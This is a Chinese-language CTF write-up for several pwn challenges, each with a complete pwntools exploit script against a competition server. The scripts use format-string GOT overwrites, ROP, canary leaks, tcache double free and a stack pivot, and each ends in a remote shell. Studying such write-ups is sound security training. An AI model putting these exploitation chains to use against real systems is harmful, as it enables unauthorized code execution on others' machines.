好了，比赛结束了，可以看了。比赛不错，都是正常思路、不坑人的题目。
pwn_签到
用 `<`（shell 输入重定向）代替空格，再用 more 读出 flag。
pwn_babyfmtstr
这里先改写memset的got表为main函数
然后多次利用 printf 泄露地址，往 free 的 got 表写入 system 函数地址
最后修复memset的got表继续执行
令motto为/bin/sh\x00
就可以在最后free的时候getshell
exp:
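from pwn import *

# Exploit for pwn_babyfmtstr: a format-string bug in the "name" prompt.
# Plan (see the write-up above):
#   1. redirect memset@got to main so the program loops and every later
#      name prompt gives another format-string write;
#   2. leak a libc pointer with %13$p;
#   3. write system() into free@got two bytes at a time with %hn;
#   4. restore memset@got so main runs on to its free();
#   5. make the motto "/bin/sh" so free(motto) becomes system("/bin/sh").
#
# All payloads are bytes, so the script runs under Python 3 pwntools as well
# as Python 2 (the original mixed str and p64() output, which is a TypeError
# on Python 3).
context(log_level="debug", arch="amd64", os="linux")

HOST, PORT = '124.156.121.112', 28052


def fmt_write_hn(value, target, arg_index=10, pad_to=16):
    """Return a printf payload that stores the 16-bit `value` at `target`.

    The format string emits `value` characters with %Nc, then %<arg_index>$hn
    writes the character count (as a short) through the pointer found at
    printf argument `arg_index` -- which is where `p64(target)` lands once
    the format string is padded to `pad_to` bytes (this binary's stack layout).
    A zero value skips %Nc entirely: "%0c" still prints one character and
    would store 1 instead of 0.

    Raises ValueError if `value` does not fit in 16 bits.
    """
    if not 0 <= value <= 0xffff:
        raise ValueError('value must fit in 16 bits: %#x' % value)
    fmt = b''
    if value:
        fmt += b'%' + str(value).encode() + b'c'
    fmt += b'%' + str(arg_index).encode() + b'$hn'
    return fmt.ljust(pad_to, b'a') + p64(target)


p = remote(HOST, PORT)
elf = ELF('./pwn3')
free_plt = elf.plt['free']
free_got = elf.got['free']
mem_got = elf.got['memset']
printf_got = elf.got['printf']
strdup_got = elf.got['strdup']
chk_plt = elf.plt['__stack_chk_fail']
chk_got = elf.got['__stack_chk_fail']
start = 0x400aa0          # kept from the original; not used by the final chain
print(hex(free_got))

NAME_PROMPT = b'please input name:\n'

p.recv()
# Step 1: low 16 bits of memset@got -> 0xe93 (3731), i.e. 0x400e93, which the
# write-up identifies as main. memset() now re-enters main.
p.sendline(fmt_write_hn(3731, mem_got))

# Step 2: leak a libc pointer sitting at printf argument 13.
p.recvuntil(NAME_PROMPT)
p.sendline(b'%13$p'.ljust(32, b'a'))
p.recvuntil(b'Hello ')
addr = int(p.recv(14), 16) - 148   # "0x" + 12 hex digits; -148 taken from the write-up
libc_base = addr - 0x6fd00         # offset of that pointer inside the target libc
print(hex(libc_base))
# Offsets for the remote's libc (0x45390 is system in Ubuntu 16.04's glibc 2.23
# build); re-derive them if the target libc differs.
system = libc_base + 0x45390
print(hex(system))
print(hex(system & 0xffff))
print(hex((system & 0xffff0000) >> 16))
print(hex((system & 0xffff00000000) >> 32))

# Step 3: free@got = system, written as three 16-bit halves (bits 0-47).
bss = free_got
for shift, where in ((0, bss), (16, bss + 2), (32, bss + 4)):
    p.recvuntil(NAME_PROMPT)
    p.sendline(fmt_write_hn((system >> shift) & 0xffff, where))

# Step 4: restore memset@got's low 16 bits (0x996 = 2454, the value the
# write-up restores -- presumably memset's unresolved PLT entry) so main
# continues to the final free() instead of looping again.
p.recvuntil(NAME_PROMPT)
print(hex(system))
p.sendline(fmt_write_hn(2454, mem_got))

# Step 5: motto = "/bin/sh\0"; free(motto) is now system(motto).
p.recvuntil(b'size')
p.sendline(b'9')
p.recvuntil(b'please input motto:\n')
p.sendline(b'/bin/sh\x00')
p.interactive()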
pwn_Magicstring
很简单的一道题目
直接栈溢出即可
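from pwn import *
import time

# Exploit for pwn_Magicstring: a plain stack overflow in a non-PIE binary.
# ROP chain: gets(bss) reads "/bin/sh" into a writable address, then
# system(bss). Payloads are bytes so the script also runs on Python 3
# pwntools (the original's str + p64() concatenation is a TypeError there).
context(log_level="debug", arch="amd64", os="linux")

p = remote('124.156.121.112', 28040)
elf = ELF('./pwn2')
system = elf.symbols['system']   # `system` as the binary's symbol table resolves it
gets_plt = elf.plt['gets']
bss = 0x601060                   # writable scratch space for the "/bin/sh" string
pop_rdi = 0x0400733              # pop rdi ; ret
pop_rsi_r15 = 0x400731           # pop rsi ; pop r15 ; ret (unused, kept for reference)
padding = 0x2a8                  # bytes from the buffer start to the saved return address

chain = [
    pop_rdi, bss, gets_plt,      # gets(bss)
    pop_rdi, bss, system,        # system(bss)
]
payload = b'a' * padding + b''.join(p64(g) for g in chain)

p.recv()
p.sendline(payload)
time.sleep(0.1)
p.sendline(b'/bin/sh\x00')      # consumed by gets(bss)
time.sleep(0.1)
# If system() faults on a movaps (16-byte stack alignment), insert a lone
# `ret` gadget in the chain right before `system`.
p.interactive()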
pwn_MengxinStack
这个题目pie和canary都开启了
先泄露canary
然后利用 main 函数返回时，把返回地址的最低一字节改为 0x29，使其落到 __libc_start_main+233 处（mov rsp,rax 之后的 call rax），程序就会重新执行 main 函数，借机泄露 libc 基址，然后常规 ROP 打就完事了。
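from pwn import *

# Exploit for pwn_MengxinStack (PIE + canary).
#  1. fill the buffer up to the canary's NUL byte so the program's echo leaks
#     the remaining 7 canary bytes;
#  2. overwrite only the lowest byte of main's saved return address (0x29) so
#     execution lands back inside __libc_start_main where main is called again;
#  3. on the second run, fill the buffer so the echo runs into the saved
#     return address (__libc_start_main+240) and leaks the libc base;
#  4. third run: canary + pop rdi ; "/bin/sh" ; system.
# The 0x4007xx gadget constants the original carried over from pwn2 were
# dropped: this binary is PIE, and pop_rdi is recomputed from libc below.
# Payloads are bytes so the script also runs on Python 3 pwntools.
context(log_level="debug", arch="amd64", os="linux")

p = remote('124.156.121.112', 28015)
elf = ELF('./pwn4')

PROMPT = b'She said: hello?'
CANARY_OFF = 0x28   # buffer start -> canary

# 1. canary leak: 0x27 bytes, a 'b' marker, and sendline's '\n' lands on
#    the canary's low 0x00 byte so the echo does not stop there.
p.recvuntil(PROMPT)
p.sendline(b'a' * (0x40 - 0x18 - 1) + b'b')
p.recvuntil(b'b\n')
canary = u64(p.recv(7).rjust(8, b'\x00'))   # the low byte of a canary is always 0
print(hex(canary))

# 2. partial overwrite of the saved return address; the upper bytes stay intact,
#    so this works without knowing the libc address yet.
p.send(b'a' * CANARY_OFF + p64(canary) + p64(0) * 3 + b'\x29')

# 3. libc leak.
p.recvuntil(PROMPT)
p.send(b'a' * 0x40 + b'b' * 8)
p.recvuntil(b'bbbbbbbb')
libc_main_addr = u64(p.recv(6).ljust(8, b'\x00')) - 240   # __libc_start_main+240 -> __libc_start_main
print(hex(libc_main_addr))
libc_base = libc_main_addr - 0x20740
print(hex(libc_base))

# Offsets for the remote's libc (they match the Ubuntu 16.04 glibc 2.23
# build); re-derive them if the target libc differs.
pop_rdi = libc_base + 0x21102    # pop rdi ; ret
bin_sh = libc_base + 0x18cd57    # "/bin/sh"
system = libc_base + 0x45390

# 4. final chain: system("/bin/sh").
p.send(b'a' * CANARY_OFF + p64(canary) + p64(0) * 3
       + p64(pop_rdi) + p64(bin_sh) + p64(system))
p.interactive()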
pwn_babyheap
简单的tcache heap
chunk 大小固定，利用 tcache double free 先把 list 指针改到 free 的 got 表泄露 libc，再把 __free_hook 改写成 system 即可。
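from pwn import *

# Exploit for pwn_babyheap: fixed-size tcache chunks and a global table of
# chunk pointers at list_addr. The write-up relies on free() not clearing the
# table entry, so a chunk can be freed twice (tcache without the double-free
# check, as in glibc 2.27).
#  1. double free -> tcache poisoning -> allocate on top of the pointer table,
#     set list[0] = free@got, show(0) leaks libc;
#  2. second double free -> allocate on __free_hook, write system;
#  3. free() the chunk holding "/bin/sh".
# Payloads are bytes so the script also runs on Python 3 pwntools.
context(log_level="debug", arch="amd64", os="linux")

p = remote('124.156.121.112', 28032)
elf = ELF('./PWN_babyheap')
list_addr = 0x602060          # global array of chunk pointers (index -> chunk)
free_got = elf.got['free']


def _menu(choice):
    """Wait for the menu prompt and send `choice` (bytes)."""
    p.recvuntil(b'>>')
    p.sendline(choice)


def add(content):
    """Menu 1: allocate the next chunk and fill it with `content` (bytes).

    sendline appends '\\n' after `content`.
    """
    _menu(b'1')
    p.recvuntil(b'message_of_your 36D:')
    p.sendline(content)


def free(idx):
    """Menu 2: free chunk `idx`."""
    _menu(b'2')
    p.recvuntil(b'index:')
    p.sendline(str(idx).encode())


def show(idx):
    """Menu 3: print the contents of chunk `idx`."""
    _menu(b'3')
    p.recvuntil(b'index:')
    p.sendline(str(idx).encode())


# chunks 0..3
for _ in range(4):
    add(b'aa')
free(0)
free(1)
free(2)
# show(2) prints chunk 2's tcache `next` pointer; heap base is for reference only.
show(2)
heap_addr = u64(p.recvuntil(b'\x0a', drop=True).ljust(8, b'\x00')) - 0x290
print(hex(heap_addr))

# Double free chunk 3; the next three allocations come back as chunk 3,
# chunk 3 again, and finally list_addr itself (chunk 6), whose first 8 bytes
# are list[0].
free(3)
free(3)
add(p64(list_addr))   # 4: poisons chunk 3's next pointer
add(p64(list_addr))   # 5: chunk 3 again
add(p64(free_got))    # 6: sits on the pointer table -> list[0] = free@got
show(0)
free_addr = u64(p.recv(6).ljust(8, b'\x00'))
print(hex(free_addr))
# Offsets for the remote's libc (consistent with Ubuntu 18.04's glibc 2.27
# build); verify against the real target libc.
libc = free_addr - 0x097950
print(hex(libc))
free_hook = libc + 0x3ed8e8
system = libc + 0x4f440

add(b'/bin/sh\x00')   # 7: the argument chunk
add(b'cc')            # 8
add(b'dd')            # 9
free(9)
free(9)
add(p64(free_hook))   # 10: poisons chunk 9's next pointer
add(p64(free_hook))   # 11: chunk 9 again
add(p64(system))      # 12: __free_hook = system
print(hex(libc))
free(7)               # free("/bin/sh") -> system("/bin/sh")
p.interactive()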
pwn_tang
保护全开
应该是先格式化字符串泄露一下canary,接着返回main函数再次泄露libc
然后栈迁移
整体还是前面那种改 main 返回地址最低字节重入 main 的打法，再加上一次栈迁移（leave;ret 把 rsp 迁到已知地址的缓冲区，执行 one_gadget）。
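from pwn import *

# Exploit for pwn_tang (all mitigations on).
#  1. format string "%9$p" leaks the canary;
#  2. partial overwrite of main's saved return address (low byte 0x29) re-enters main;
#  3. "%23$p" leaks __libc_start_main+240 -> libc base; re-enter main again;
#  4. "%27$p" leaks a program pointer -> PIE base -> address of a global buffer;
#  5. stash [fake rbp][one_gadget] in that buffer, then pivot onto it with
#     rbp = buf+0x110 ; leave ; ret.
# Payloads are bytes so the script also runs on Python 3 pwntools.
context(log_level="debug", arch="amd64", os="linux")

p = remote('124.156.121.112', 28028)
elf = ELF('./PWN_tang')

CANARY_OFF = 0x38   # buffer start -> canary


def reenter_main(canary):
    """Return a buffer that passes the canary check and re-runs main.

    Only the lowest byte of the saved return address is replaced (0x29); the
    upper bytes of the libc pointer stay intact, so no address is needed yet.
    """
    return b'a' * CANARY_OFF + p64(canary) + p64(0) * 3 + b'\x29'


# 1. canary
p.recvline()
p.sendline(b'%9$p')
canary = int(p.recv(18), 16)     # "0x" + 16 hex digits
print(hex(canary))
p.recv()
p.send(b'aaaa')

# 2. back into main
p.recv()
p.send(reenter_main(canary))

# 3. libc leak
p.sendline(b'%23$p')
p.recvline()
libc_main = int(p.recv(14), 16) - 240     # "0x" + 12 hex digits; __libc_start_main+240
libc_base = libc_main - 0x20740
# Offsets for the remote's libc (they match the Ubuntu 16.04 glibc 2.23 build).
pop_rdi = libc_base + 0x21102            # unused here; system("/bin/sh") alternative
bin_sh = libc_base + 0x18cd57            # unused here; system("/bin/sh") alternative
system = libc_base + 0x45390             # unused here; system("/bin/sh") alternative
leave_ret = libc_base + 0x42351          # leave ; ret
one_gadget = libc_base + 0xf1147         # execve("/bin/sh"), needs [rsp+0x70] == NULL
print(hex(libc_base))
p.send(reenter_main(canary))
p.recv()

# 4. PIE leak
p.send(b'%27$p')
p.recvline()
offset = int(p.recv(14), 16) - 0x9ed     # PIE base
print(hex(offset))

# 5. stage [fake rbp][one_gadget] at buf+0x110 / buf+0x118, then pivot there.
#    leave;ret sets rsp = buf+0x118 and returns into one_gadget.
p.send(b'a' * 0x110 + b'a' * 8 + p64(one_gadget))
buf_addr = offset + 0x201040             # global buffer the write-up targets with the send above
print(hex(buf_addr))
p.recv()
p.send(b'a' * CANARY_OFF + p64(canary) + p64(0) * 2
       + p64(buf_addr + 0x110) + p64(leave_ret))
p.interactive()

# one_gadget output for the target libc (offsets relative to libc_base):
#   0x45216 execve("/bin/sh", rsp+0x30, environ)  constraints: rax == NULL
#   0x4526a execve("/bin/sh", rsp+0x30, environ)  constraints: [rsp+0x30] == NULL
#   0xf02a4 execve("/bin/sh", rsp+0x50, environ)  constraints: [rsp+0x50] == NULL
#   0xf1147 execve("/bin/sh", rsp+0x70, environ)  constraints: [rsp+0x70] == NULL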